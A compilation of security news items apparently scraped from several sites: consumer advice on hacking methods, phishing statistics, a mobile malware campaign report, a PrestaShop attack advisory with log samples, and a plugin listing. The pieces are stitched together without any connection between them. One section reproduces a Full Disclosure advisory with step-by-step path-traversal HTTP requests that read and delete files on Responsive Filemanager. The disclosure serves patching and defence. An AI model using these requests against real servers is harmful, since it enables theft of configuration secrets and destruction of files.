By Owais Sultan
The advent of the digital age is a source of blessing in a way that makes life easier…
This is a post from HackRead.com Read the original post: Ways Hackers Can Steal Information from Your Device

****The advent of the digital age is a source of blessing in a way that makes life easier yet, it comes with some challenges including malicious hackers and cyber attacks.****

The threats posed by hackers to organizations and individuals have become a major concern as those fraudulent elements keep on increasing and devising new methods of perpetrating their sinister acts.

According to research by a software testing firm, not less than 30,000 websites are hacked daily worldwide and every 39 seconds there is a new cyber-attack launched at someone on the web. 

Let’s dig deeper into how hackers operate and how you can protect yourself from cyber attacks and scams.

Social engineering is a tricky one! Hackers can manipulate you by posing as someone you know and compel you to take action if they want to steal your information. For example, they may send you a link from a hacked social media profile, and create urgency by asking you to take some action.

After you click the link, you will be taken to a page that will require you to sign in to your Google or Apple, or similar account. But the form does not login to your account, it will instead be a fake login page created by crooks to steal your login credentials.

A recent example of a successful social engineering attack includes the Singaporean identity fraud scammer Ho Jun Jia (a/k/a Matthew Ho, a/k/a, Prefinity a/k/a Ethereum Vendor) who is now in prison for scamming in the name of the co-founder and co-chairman of Riot Games Mr. Marc Merrill.

Ho also used social engineering skills to trick Google and Amazon Web Services (AWS) into providing $5.4 million worth of cloud computing services by using personal details of Merrill.

**Keylogger**

Keylogger is designed to secretly spy on victims and can capture everything you type on your keyboard and every command you execute. It captures your passwords, credit card numbers, keystrokes, and browsing history.

It is worth noting that a keylogger can be software or a hardware device such as a malicious USB.

Software Keyloggers sneak into your computer system via harmful links or attachments. A hardware-based keylogger can be installed on your device if attackers have physical access to your computer.

**Public Wi-Fi Eavesdropping**

Wi-Fi eavesdropping can be defined as the act whereby your vital data is stolen by a hacker after exploiting an unsecured public Wi-Fi network. Because some public Wi-Fi allow unsecured transmission of data, your vital information, and files that are unencrypted are at the risk of hackers.

One of the gimmicks used by hackers is that they would name their hotspot after the name of the business premises or shopping mall etc. The Wi-Fi will probably be free and without a password so you are tempted to go for freebies. 

Once you connect to the hacker’s Wi-Fi, the hacker can see everything you do and steal your personal information including passwords. You can avoid this by not using public Wi-Fi, using your own hotspot device plus enabling your VPN at all times.

**SIM Swap Fraud**

A SIM swap attack is when a cybercriminal(s) calls your network provider and impersonates you. They claim that your SIM card is lost and they want to port your number to a new hacker-controlled SIM card.

Of course, your network provider will ask some questions to identify the person requesting the swap. These questions can be easily answered based on the Infomation you have provided about yourself on your social media accounts. (Don’t share your personal information on social media).

In this age of two-factor authentication (2FA) and USSD banking, your SIM card is coveted by hackers. This is because when they get your SIM card, they can bypass 2FA and intercept OTP (one-time password) as the verification code is sent to your swapped phone number.

Equity and forex trading brokerages also offer online trading apps that use 2FA to verify and authenticate users. When your SIM has been swapped, this verification code goes straight to the hacker who now controls your phone number.

Once the attacker has the verification code, they can link a new account to your investment, crypto wallet, or trading app and wire funds out. They can also use the funds in your account to buy worthless shares from other scammers thus enriching them and impoverishing you.

**Browser Hijacking**

An attacker can install malware right into your internet browser without you even knowing. This can happen when you click on an unknown link or download an app from a 3rd-party store. Most of the apps available in such stores are Trojans meaning they are not what they claim to be. By installing them, you could install a virus into your browser as well.

The virus in your browser then begins to redirect you to hacker-controlled sites that resemble legitimate sites. From there, your passwords are collected and used to access your accounts. 

**IP Spoofing**

This is the act whereby a hacker hijacks your browsing connection through the usage of a fake Internet Protocol (IP) address. A publication by Dell Technologies shows that there are over 30,000 spoofing attacks every day around the world.

IP spoofing scams mostly occur at a location where internal systems trust one another in a way that users can have access without any username or password, provided they are connected with the network.

It involves the act of masquerading as a fake computer IP address in a way that would look like a legitimate one. In the course of IP spoofing, attackers convey a message to a computer system with a fake IP address which shows that the message is coming from a different IP address. 

**Domain Name System (DNS) Spoofing/ Poisoning**

The term ‘spoofing’ has to do with impersonation. In this case, a hacker’s computer is impersonating a legitimate computer on a network. A domain name is simply a website name like ‘www.google.com’

DNS spoofing, let’s assume you want to visit Twitter and you type the domain name ‘www.twitter.com’ into your browser’s URL bar. This domain name is sent to a DNS server which converts the domain name of Twitter into an IP address example 172.28.213.15 which is supposed to be the IP address of Twitter’s official computer server.

The hacker spoofs it by deceiving the DNS server to convert Twitter’s domain name into a **different** hacker-controlled IP address which takes you to the hacker’s server instead of Twitter’s server.

The attackers could have designed a fake Twitter page and hosted it on his spoofed server. Once you attempt to log in, they can steal your password and use it to access your account. 

The result of DNS poisoning is that any information you send is routed through the hacker before it gets to the web. This allows them to steal your passwords and access your accounts. 

**Domain Spoofing**

This online fraud, also known as a homograph attack occurs when a hacker makes use of a domain name that greatly resembles the website you are trying to visit.  Perpetrating this act, the hacker replaces the characters in the fake domain name with other non-ASCII characters that look much alike in appearance.

It will be designed in such a way that you may not notice the difference, as you would be assured about the secure connection of the browser. To begin the process of HTTP spoofing, the cyber attacker’s first step is to register a domain name that resembles yours.

The scammer would then proceed to send a link to you, and you may likely not notice that you are visiting a fake version of the site you planned to go to because the majority of browsers display puny code host names in their address bar. One such example is:

It’s Google.com not ɢoogle.com

This scamming system is designed to even prove to you that the website’s SSL certificate is real, thereby preventing you from detecting the fraud.

**Session Hijacking**

When you visit a website, you might notice a popup prompting you to allow cookies. Cookies refer to your personal information stored temporarily in your computer’s cache memory and are deleted after you leave the site. _(Here’s how to disable Cookies notice for good)_.

Cookies contain a unique ‘session ID’ number which if gotten by a hacker, will enable them to take over your session. An attacker can steal your cookies using different means such as phishing scams where they send you an email containing a malicious link. When you click on the link, it will install malware for session hijacking.

The point here is, that once an attacker steals your cookie or gets your session ID, they can take over your browsing session and if you were visiting a bank website, they can steal your funds. You may notice the page freeze, or some technical difficulty while this is going on and when it’s over, your money is gone. 

**Don’t Be Caught Off Guard**

*   Never download files from suspicious emails, messages, or contacts. Also, never click a link shared by an unknown source, or enter your account details and password on websites that you don’t trust.
*   Ensure that your two-factor authentication is enabled. Or you can also use token-based logins.
*   Don’t send PINs, passwords, and your financial details via text or email.
*   To guard against IP Spoofing, ensure you use a Virtual Private Network (VPN). Or use anti-malware software with web protection, that blocks unknown websites.

Ways Hackers Can Steal Information from Your Device

Instances of phishing attacks leveraging the Microsoft brand increased 266 percent in Q1 compared to the year prior.

Instances of phishing attacks leveraging the Microsoft brand increased 266 percent in Q1 compared to the year prior.

The bloom is back on phishing attacks with criminals doubling down on fake messages abusing popular brands compared to the year prior. Microsoft, Facebook and French bank Crédit Agricole are the top abused brands in attacks, according to study on phishing released Tuesday.

According to the report by researchers at Vade, phishing attacks abusing the Microsoft brand increased 266 percent in the first quarter of 2022, compared to the year prior. Fake Facebook messages are up 177 percent in the second quarter of 2022 within the same timeframe.

The study by Vade analyzed unique instances of phishing URLs used by criminals carrying out phishing attacks and not the number of phishing emails associated with the URLs. The report tallied the 25 most commonly targeted companies, along with the most abused industries and days of the week for phishing emails.

****Phishing By the Numbers****

Other top abused brands in phishing attacks include Credit Agricole, WhatsApp, and French telecommunications company Orange. Popular brands also included PayPal, Google and Apple (see chart).

Click to Enlarge

Through the first half of 2022, 34 percent of all unique phishing attacks tracked by the researchers impersonated financial services brands. The next most popular industry for criminals to abuse is cloud and the firms Microsoft, Google and Adobe. Social media was also a popular target with Facebook, WhatsApp and Instagram leading the list of brands leveraged in attacks.

The report revealed the most popular days for sending phishing emails is between Monday and Wednesday. Less than 20 percent of malicious emails are sent on the weekend.

“Phishing attacks are more sophisticated than ever,” wrote Adrien Gendre, chief tech and product officer at Vade in an email to Threatpost.

“Hackers have an arsenal of tools at their disposal to manipulate end users and evade email security, including phishing kits that can identify when they are being scanned by a vendor and trigger benign webpages to avoid detection. End users need to be continually trained to identify the latest phishing techniques,” he wrote.

Phishing Attacks Skyrocket with Microsoft and Facebook as Most Abused Brands

Authenticated WordPress Options Change vulnerability in Biplob Adhikari's Flipbox plugin <= 2.6.0 at WordPress.

CVE-2022-33969: Changeset 2648808 – WordPress Plugin Repository

A vulnerability was found in Tecrail Responsive Filemanger up to 9.10.x and classified as critical. The manipulation leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 9.11.0 is able to address this issue. It is recommended to upgrade the affected component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives****Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure/Deletion**

_From_: Wiswat A <wiswat.a () gmail com>  
_Date_: Wed, 8 Feb 2017 00:28:23 +0700  

\[+\] Exploit Title: Responsive Filemanger <= 9.11.0 - Arbitrary File
Disclosure/Deletion
\[+\] Date: 7 Feb 2017
\[+\] Vulnerability and Exploit Author: Wiswat Aswamenakul
\[+\] Vendor Homepage: http://www.responsivefilemanager.com/
\[+\] Affected version: only tested on 9.11.0 and 9.7.3 (other versions
might be affected)
\[+\] Tested on: Ubuntu 14.04, PHP 5.5.9
\[+\] Category: webapps

\[+\] Description
Responsive filemanger is a PHP based file manager that make use of AJAX
technology. It has various useful features. One of them is copy/cut and
paste files. However, the copy/cut feature does not santize file name
that will be copied/cut. Therefore, it is possible for attackers to
copied/cut any files including PHP files and paste them to overwrite
existing image files. Then, the attackers could download the overwritten
image files to read the content of the copied/cut files. Moreover, for
the cut feature, it can cause the original files to be deleted as well.

\[+\] Exploit
1. Upload a normal image file (jpg, png, gif) to a server
2. Right click at any files, select copy and capture the request with
Burp Suite (or any local proxy)
3. Change parameter "path" to any file name that we would like to
download, for example, path=../filemanager/config/config.php

###
POST /fm/filemanager/ajax\_calls.php?action=copy\_cut HTTP/1.1
Host: 192.168.1.128
Content-Length: 53
Accept: \*/\*
Origin: http://192.168.1.128
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer:
http://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en\_EN&popup=0&crossdomain=0&field\_id=&relative\_url=0&akey=key&fldr=%2F&5869110e2a073
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: last\_position=%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0
Connection: close

path=../filemanager/config/config.php&sub\_action=copy
###

4. Go to any sub directory, right click at any files, intercept the
request with burp, select "Paste to this directory"
5. Change parameter "path" to the image file uploaded in step 1, for
example, path=subdir/size.png

###
POST /fm/filemanager/execute.php?action=paste\_clipboard HTTP/1.1
Host: 192.168.1.128
Content-Length: 20
Accept: \*/\*
Origin: http://192.168.1.128
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer:
http://192.168.1.128/fm/filemanager/dialog.php?editor=0&type=0&lang=en\_EN&popup=0&crossdomain=0&field\_id=&relative\_url=0&akey=key&fldr=subdir%2F&5869110f9a268
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: last\_position=subdir%2F; PHPSESSID=lenmc074o86fe2sq7i1dtnh8j0
Connection: close

path=subdir/size.png
###

6. Download the image file uploaded in step 1, it will contain content
of the file specified in step 3

\[+\] Note (about another issue I found)
During this report, I found another separated issue with the attack
filtering that only check for "../" but not "..\\" which can be used to
bypass all filters if the application runs on Windows server and reported
the issue to the owner as well. However, I found out that this issue was
found by a guy from hacktizen and detailed in following blog post
http://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html
So, the credit goes for the guy who firstly reported. Perhaps, the guy from
hackitizen did not contact the owner of responsive filemanger or there are
any problems with communication. Therefore, the issue remains unresolved.

\[+\] Timeline
- 02/01/2017: Contact Owner
- 05/02/2017: Patched version is available
- 07/02/2017: Public Advisory

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure/Deletion** _Wiswat A (Feb 07)_

CVE-2017-20145: Full Disclosure: Responsive Filemanger <= 9.11.0

The mobile threat campaign tracked as Roaming Mantis has been linked to a new wave of compromises directed against French mobile phone users, months after it expanded its targeting to include European countries.
No fewer than 70,000 Android devices are said to have been infected as part of the active malware operation, Sekoia said in a report published last week.
Attack chains involving Roaming

The mobile threat campaign tracked as **Roaming Mantis** has been linked to a new wave of compromises directed against French mobile phone users, months after it expanded its targeting to include European countries.

No fewer than 70,000 Android devices are said to have been infected as part of the active malware operation, Sekoia said in a report published last week.

Attack chains involving Roaming Mantis, a financially motivated Chinese threat actor, are known to either deploy a piece of banking trojan named MoqHao (aka XLoader) or redirect iPhone users to credential harvesting landing pages that mimic the iCloud login page.

"MoqHao (aka Wroba, XLoader for Android) is an Android remote access trojan (RAT) with information-stealing and backdoor capabilities that likely spreads via SMS," Sekoia researchers said.

It all starts with a phishing SMS, a technique known as smishing, enticing users with package delivery-themed messages containing rogue links, that, when clicked, proceed to download the malicious APK file, but only after determining if a victim's location is within French borders.

Should a recipient be located outside France and the device operating system is neither Android nor iOS – a factor ascertained by checking the IP address and the User-Agent string – the server is designed to respond with a "404 Not found" status code.

"The smishing campaign is therefore geofenced and aims to install Android malware, or collect Apple iCloud credentials," the researchers pointed out.

MoqHao typically uses domains generated through the dynamic DNS service Duck DNS for its first-stage delivery infrastructure. What's more, the malicious app masquerades as the Chrome web browser application to trick users into granting it invasive permissions.

The spyware trojan provides a pathway window for remote interaction with the infected devices, enabling the adversary to stealthily harvest sensitive data such as iCloud data, contact lists, call history, SMS messages, among others.

Sekoia also assessed that the amassed data could be used to facilitate extortion schemes or even sold to other threat actors for profit. "more than 90.000 unique IP addresses that requested the C2 server distributing MoqHao," the researchers noted.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Roaming Mantis Financial Hackers Targeting Android and iPhone Users in France

The next time someone wants to borrow your device to make a call or take a picture, take these steps to protect your privacy.

From the nephew who wants to play games for a few minutes, to the friend who wants to see your vacation snaps, to the stranger who needs to make a call, there are going to be people who want to borrow your phone.

That's quite a privacy and security risk if you think about everything that your phone gives you access to: social media profiles, banking details, instant messenger conversations, photos and videos that you'd rather the world didn't see, and so on.

However, there are ways to hand over your phone to someone else without having to worry about what they might get up to on it. You just need to make sure that you've taken a few precautions before the exchange takes place.

iPhone

Guided Access is built into iOS.

Apple via David Nield

(Apple via David Nield)

The feature you need to know about on the iPhone is called Guided Access, and you can enable it by opening up iOS Settings and choosing **Accessibility** and **Guided Access**. Turn the **Guided Access** toggle switch on and the feature is ready to go—just make sure you use **Passcode Settings** to set a passcode to protect Guided Access mode.

To actually turn Guided Access on, you need to triple-tap the home button if your iPhone has one, or the side button if it doesn't. You can then tap **Options** to configure how Guided Access is going to work: You're able to restrict access to the volume buttons, for example, and the software keyboard. You can even turn off touchscreen functionality and put a limit on Guided Access mode. Tapping **Start** launches Guided Access.

Whoever is using the iPhone is then locked into the current app, so you need to open up the app in question—the Phone app, a particular game, or whatever it is—before you triple-tap the button on your device to launch Guided Access. You get out of Guided Access with another triple-tap of the same button, at which point you'll need the passcode that you set at the start.

The idea is that without the passcode, the person using your iPhone can't get out of the app you've put them in—there's no way to switch apps, open up the Control Center, or even turn the phone off. It's worth being aware of the app that they're in, though, and what they can do inside that app: If you're showing someone your photos, they'll be able to access all of them.

One extra option in the Photos app is to hide photos and videos by opening them, tapping the share button (bottom left), and choosing **Hide**. This hides these pictures and clips in a special Hidden folder. They won't be visible in normal view in the Photos app, and they won't appear in searches, but the person borrowing your smartphone can still get at them by choosing **Hidden** from the **Albums** tab.

Android

Apps can be pinned inside Android.

Google via David Nield

If you're using an Android device, you can take advantage of a feature similar to Guided Access on iOS. It's called App Pinning, and again the idea is that the person borrowing your phone is limited to one app. They're not able to get to another app or access the phone's settings without a PIN code set by you.

There are certain software variations among Android phone makers when it comes to finding and enabling App Pinning, but you should be able to find it without too much trouble. On the stock version of Android that Google puts in its Pixel phones, you can enable it by going to the main Android Settings menu, then choosing **Security**, **Advanced Settings** and **App Pinning**.

Turn on the **Use App Pinning** toggle switch, and make sure that **Ask for PIN Before Unpinning** is enabled as well—this prevents everyone but you from switching apps. To find the app you want to pin, swipe up and hold from the bottom of the screen until you see thumbnails of your recently used apps. Find the one you want, tap the app icon at the top, and choose **Pin** from the drop-down menu. 

To get out of app pinning, swipe up and hold from the bottom of the screen again. The phone will be locked, and your PIN code will be required to regain access and move between apps. Assuming that the person borrowing your phone doesn't know your PIN, you'll be able to keep them in one app.

Like Apple Photos, Google Photos can also hide photos and videos, which can help if someone is browsing through your pictures. Open an image or clip, tap the three dots (top right), then choose **Move to Locked Folder**—the photos and videos that you send here can't be accessed without unlocking your phone first, which will require a PIN, a fingerprint scan, or a face scan, depending on how you've set it up.

How to Safely Lend Someone Else Your Phone

Plus: The FCC cracks down on car warranty robocalls, Thai activists get targeted by NSO's Pegasus, and the Russia-Ukraine cyberwar continues.

As the United States midterm elections near, lawmakers and law enforcement officials are on high alert about violent threats targeted at election officials across the country—domestic threats that have taken first billing over foreign influence operations and meddling as the primary concern for the 2022 elections. In another arena, though, Congress is making progress on generating bipartisan support for sorely needed and overdue privacy legislation in the form of the American Data Privacy and Protection Act.

Iranian women’s rights activists sounded the alarm this week that Meta has not been responsive to their concerns about targeted bot campaigns flooding their Instagram accounts during a crucial moment for the country’s feminist movement. And investigators looking at attacks on internet cables in Paris have still not determined who was behind the vandalism or what their motive was, but new details have emerged about the extent of the sabotage, making the situation all the more concerning and intriguing. 

The ACLU released documents this week that detail the Department of Homeland Security’s contracts with phone-tracking data brokers who peddle location information. And if you’re worried about Big Brother snooping on your reproductive data, we have a ranking of the most popular period-tracking apps by their data privacy protections. 

And there’s more. Each week we round up the news that we didn’t break or cover in-depth. Click on the headlines to read the full stories. And stay safe out there!

The Department of Homeland Security Inspector General told the Secret Service on Thursday to halt its investigation into the deletion of January 6 insurrection-related text messages because of an “ongoing criminal investigation” into the situation. Secret Service spokespeople have said conflicting things: that data on the phones was erased during a planned phone migration or factory reset, and that the erased messages were not relevant to the January 6 investigation. The Secret Service said it provided agents with a guide to backing up their data before initiating the overhaul process, but noted that it was up to the individuals to complete this backup. 

Zero Day spoke to Robert Osgood, director of the forensics and telecommunications program at George Mason University and a former FBI digital forensics examiner, about the situation. “Osgood said that telling agents to back up their own phones ‘makes absolutely no sense’— particularly for a government agency engaged in the kind of work the Secret Service does and required to retain records. The agency is not only charged with protecting the president, vice president and others, it also investigates financial crimes and cybercrime,” reports Zero Day author Kim Zetter. “I’m pro-government, and \[telling agents to back up their own phones\] sounds strange,” Osgood told Zetter. “If that did happen, the IT manager that’s responsible for that should be censured. Something should happen to that person because that’s one of the dumbest things I’ve ever heard in my life.'”

The Federal Communications Commission’s Robocall Response Team said on Thursday that it is ordering phone companies to block robocalls that warn about expiring car warranties and offer renewal deals. The FCC said that the calls, which are familiar to people around the US, have come from “Roy Cox Jr., Aaron Michael Jones, their Sumco Panama companies, and international associates.” Since 2018 or possibly earlier, their operations have resulted in more than 8 billion prerecorded message calls to Americans, the FCC said. “We are not going to tolerate robocall scammers or those that help make their scams possible," FCC chairperson Jessica Rosenworcel said in a statement. “Consumers are out of patience and I’m right there with them.”

After Apple warned a number of Thai activists and their associates in November that their devices might have been targeted with NSO Group’s notorious Pegasus spyware, a number of them reached out to human rights groups and researchers who established a broader picture of a campaign in Thailand. In all, more than 30 Thai victims have been identified. The targets worked with the local human rights group iLaw, which found that two of its own members had been victims of the campaign, as well as University of Toronto’s Citizen Lab and Amnesty International. The researchers did not provide attribution for who was behind the Pegasus campaigns, but found that a lot of the targeting occurred in the same general time when the targets were participating in protests against government policies.

Google’s Threat Analysis Group reported this week that it has seen Russia’s digital meddling continue apace, both in Ukraine as the Kremlin’s invasion rages on and in Eastern Europe more broadly. TAG detected the Russia-linked hacking group Turla attempting to spread two different malicious Android apps through sites that masqueraded as being Ukrainian. The group tried to market the apps by claiming that downloading them would play a role in launching denial of service attacks on Russian websites, an interesting twist given the civilian efforts in Ukraine to mount cyberattacks against Russia. TAG also detected activity from other known Russian hacking groups that were exploiting vulnerabilities to target Ukrainian systems and launching disinformation campaigns in the region.

Ukrainian officials also said this week that Russia had conducted an attack on Ukraine’s TAVR Media, hacking nine popular radio stations to spread false information that Ukrainian President Volodymyr Zelensky was in intensive care because of a critical ailment. The broadcast further claimed that Ruslan Stefanchuk, chairperson of the Verkhovna Rada, was in command in Zelensky’s stead. TAVR put out a statement on Facebook saying that the broadcasts did “not correspond to reality.” And Zelensky posted a video on his Instagram attributing the attack to Russia and saying that he is in good health.

The January 6 Secret Service Text Scandal Turns Criminal

PrestaShop 1.6.0.10 through 1.7.x before 1.7.8.2 allows remote attackers to execute arbitrary code, aka a "previously unknown vulnerability chain" related to SQL injection, as exploited in the wild in July 2022.

Attackers have found a way to use a security vulnerability to carry out arbitrary code execution in servers running PrestaShop websites. For details, please read the entire article.

**What’s happening**

The maintainer team has been made aware that malicious actors are exploiting a combination of known and unknown security vulnerabilities to inject malicious code in PrestaShop websites, allowing them to execute arbitrary instructions, and potentially steal customer’s payment information.

While investigating this attack, we found a previously unknown vulnerability chain that we are fixing. At the moment, however, we cannot be sure that it’s the only way for them to perform the attack. To the best of our understanding, this issue seems to concern shops based on versions 1.6.0.10 or greater, subject to SQL injection vulnerabilities. Versions 1.7.8.2 and greater are not vulnerable unless they are running a module or custom code which itself includes an SQL injection vulnerability. Note that versions 2.0.0~2.1.0 of the Wishlist (blockwishlist) module are vulnerable.

**How the attack works**

The attack requires the shop to be vulnerable to SQL injection exploits. To the best of our knowledge, the latest version of PrestaShop and its modules are free from these vulnerabilities. We believe attackers are targeting shops using outdated software or modules, vulnerable third-party modules, or a yet-to-be-discovered vulnerability.

According to our conversations with shop owners and developers, the recurring modus operandi looks like this:

1.  The attacker submits a POST request to the endpoint vulnerable to SQL injection.
2.  After approximately one second, the attacker submits a GET request to the homepage, with no parameters. This results in a PHP file called blm.php being created at the root of the shop’s directory.
3.  The attacker now submits a GET request to the new file that was created, blm.php, allowing them to execute arbitrary instructions.

After the attackers successfully gained control of a shop, they injected a fake payment form on the front-office checkout page. In this scenario, shop customers might enter their credit card information on the fake form, and unknowingly send it to the attackers.

While this seems to be the common pattern, attackers might be using a different one, by placing a different file name, modifying other parts of the software, planting malicious code elsewhere, or even erasing their tracks once the attack has been successful.

**What to do to keep your shop safe**

First of all, make sure that your shop and all your modules are updated to their latest version. This should prevent your shop from being exposed to known and actively exploited SQL injection vulnerabilities.

According to our current understanding of the exploit, attackers might be using MySQL Smarty cache storage features as part of the attack vector. This feature is rarely used and is disabled by default, but it can be enabled remotely by the attacker. Until a patch has been published, we recommend physically disabling this feature in PrestaShop’s code in order to break the attack chain.

To do so, locate the file config/smarty.config.inc.php on your PrestaShop install, and remove lines 43-46 (PrestaShop 1.7) or 40-43 (PrestaShop 1.6):

    if (Configuration::get('PS_SMARTY_CACHING_TYPE') == 'mysql') {
        include _PS_CLASS_DIR_.'Smarty/SmartyCacheResourceMysql.php';
        $smarty->caching_type = 'mysql';
    }
    

**How to tell if you have been affected**

Consider looking at your server’s access log for the attack pattern explained above. This is an example shared by a community member:

    - [14/Jul/2022:16:20:56 +0200] "POST /modules/XXX/XXX.php HTTP/1.1" 200 82772 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14"
     
    - [14/Jul/2022:16:20:57 +0200] "GET / HTTP/1.1" 200 63011 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36"
     
    - [14/Jul/2022:16:20:58 +0200] "POST /blm.php HTTP/1.1" 200 82696 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
    

(Note: the vulnerable module’s path has been modified for security reasons)

Be aware that not finding this pattern on your logs doesn’t necessarily mean that your shop has not been affected by the attack: the complexity of the exploit means that there are several ways of performing it, and attackers might also try and hide their tracks.

Consider contacting a specialist to perform a full audit of your site and make sure that no file has been modified nor any malicious code has been added.

**Additional information**

A patch version is currently being tested, and should be released soon.

We would like to take the opportunity to stress out once more the importance of keeping your system updated to prevent such attacks. This means regularly updating both your PrestaShop software and its modules, as well as your server environment.

CVE-2022-36408: Major Security Vulnerability on PrestaShop Websites

Unauthenticated Arbitrary File Read vulnerability in MultiSafepay plugin for WooCommerce plugin <= 4.13.1 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**About MultiSafepay**  
MultiSafepay is a collecting payment service provider which means we take care of the agreements, technical details and  
payment collection required for each payment method. You can start selling online today and manage all your transactions  
from one place.

**Supported Payment Methods**

Payment methods:  
\* AfterPay  
\* Alipay  
\* American Express  
\* Apple Pay  
\* Bank transfer  
\* Bancontact  
\* Belfius  
\* Betaal per Maand  
\* Dotpay  
\* E-Invoicing  
\* EPS  
\* Giropay  
\* iDEAL  
\* in3  
\* KBC/CBC  
\* Klarna  
\* Maestro  
\* Mastercard  
\* Pay After Delivery  
\* PayPal  
\* Paysafecard  
\* Request to Pay  
\* SEPA Direct Debit  
\* SOFORT Banking  
\* Trustly  
\* Visa

Giftcards:  
\* Baby Cadeaubon  
\* Beauty & Wellness  
\* Boekenbon  
\* Fashioncheque  
\* Fashion Giftcard  
\* Gezondheidsbon  
\* GivaCard  
\* Good4fun Giftcard  
\* Goodcard  
\* Fietsbon  
\* Nationale Tuinbon  
\* Parfum Cadeaukaart  
\* Podium  
\* Sport & Fit  
\* VVV Giftcard  
\* Webshop gift card  
\* Wellness gift card  
\* Wijncadeau  
\* Winkelcheque  
\* YourGift

To use the plugin you need a MultiSafepay account.  
Create an account

**Automatic Installation**

*   Search for the ‘MultiSafepay’ plugin via ‘Add New’ from the WordPress menu
*   Press the ‘Install now’ button

**Manual Installation**

*   Download the plugin from the WordPress Plugin Directory
*   Unzip the downloaded file to a local directory
*   Upload the directory ‘multisafepay’ to /wp-content/plugins/ on the remote server

**Configuration**

*   Activate the ‘MultiSafepay’ plugin via ‘Plugin’ from the WordPress menu
*   Navigate to _WooCommerce_ -> _MultiSafepay Settings_
*   In _Account_ tab, set the API key. Information about the API key can be found on our API key page. Click on _Save changes_ button.
*   Go to _Order Status_ tab and confirm the match between WooCommerce order statuses and MultiSafepay order statuses. Click on _Save changes_ button.
*   Go to _Options_ tab and confirm the settings for each field. Click on _Save changes_ button.
*   Navigate to _WooCommerce_ -> _Settings_ -> _Payments_. Click on the payment methods you would like to offer, check and set or confirm the settings for those been enable. Click on _Save changes_ button.

**How can I install the plugin for WooCommerce?**

*   Installation instruction can be found in our Manual page.

**How can I update the plugin for WooCommerce?**

Before you update the plugin, we strongly recommend you the following:

*   Make sure you have a backup of your production environment
*   Test the plugin in a staging environment.
*   Go to our Manual page, download the plugin and follow the instructions from step 2.

**How can I generate a payment link in the backend of WooCommerce?**

It is possible to generate a payment link when an order has been created at the backend in WooCommerce.  
The customer will receive the payment link in the email send by WooCommerce with the order details. Also the payment link will be added to the order notes.

Please follow these steps:

1.  Login into your backend and navigate to WooCommerce -> Orders -> Add order.
2.  Register the order details as explained in WooCommerce documentation.
3.  In “Order actions” panel; select the option “Email invoice / order details to customer”.
4.  Click on “Create” order button.
5.  An email will be sended to the customer with the details of the order and a payment link to finish the order.
6.  The payment link will be available for the customer in their private account area, in “Orders” section.

**Can I refund orders?**

Yes, you can fully or partially refund transactions directly from your WooCommerce backend for all payment methods, except for Billing Suite payment methods in which it is only possible to process full refunds.  
You can also refund from your MultiSafepay Control

MultiSafe plugin is nice as the plugin shows available currency Based on Geolocation IP.

Smoothless integration of the world's most versatile payment system into Woocommerce

Read all 2 reviews

“MultiSafepay plugin for WooCommerce” is open source software. The following people have contributed to this plugin.

Contributors

*    multisafepayplugin

**Release Notes – WooCommerce 4.17.2 (Jul 22st, 2022)****Fixed**

*   PLGWOOS-825: Fix an issue in which some payment methods are not being shown in the checkout, because of the setting field country selector is assuming the wrong value in some cases

**Release Notes – WooCommerce 4.17.1 (Jul 22st, 2022)****Changed**

*   PLGWOOS-817: Improvement in the escaping of the outputs of the settings page

**Release Notes – WooCommerce 4.17.0 (Jul 21st, 2022)****Removed**

*   PLGWOOS-816: Remove validation to check if a gateway is enabled in the merchant account, before activate the WooCommerce payment method
*   PLGWOOS-818: Remove upgrade notice functionality in plugin list page

**Changed**

*   PLGWOOS-817: Improvement in sanitization and validation of the inputs, and escaping the outputs

**Release Notes – WooCommerce 4.16.0 (Jul 20th, 2022)****Added**

*   DAVAMS-490: Add MyBank payment method

**Removed**

*   PLGWOOS-811: Remove download plugin logs button and related methods

**Release Notes – WooCommerce 4.15.0 (May 25th, 2022)****Added**

*   DAVAMS-470: Add terms and conditions checkbox to AfterPay

**Changed**

*   PLGWOOS-805: Declare support for WordPress 6.0

**Release Notes – WooCommerce 4.14.0 (May 19th, 2022)****Added**

*   DAVAMS-476: Add Alipay+

**Changed**

*   PLGWOOS-804: Use default locale if get\_locale returns null to prevent third party plugin errors
*   PHPSDK-93: Upgrade the PHP-SDK dependency to 5.5.0

**Release Notes – WooCommerce 4.13.1 (Mar 23th, 2022)****Added**

*   PLGWOOS-792: Declare support for WordPress 5.9.2 and WooCommerce 6.3.1
*   PLGWOOS-790: Improvement on debug mode, logging the body of the POST notification request

**Fixed**

*   PLGWOOS-791: Fix error when WooCommerce order is not found after receive a valid POST notification

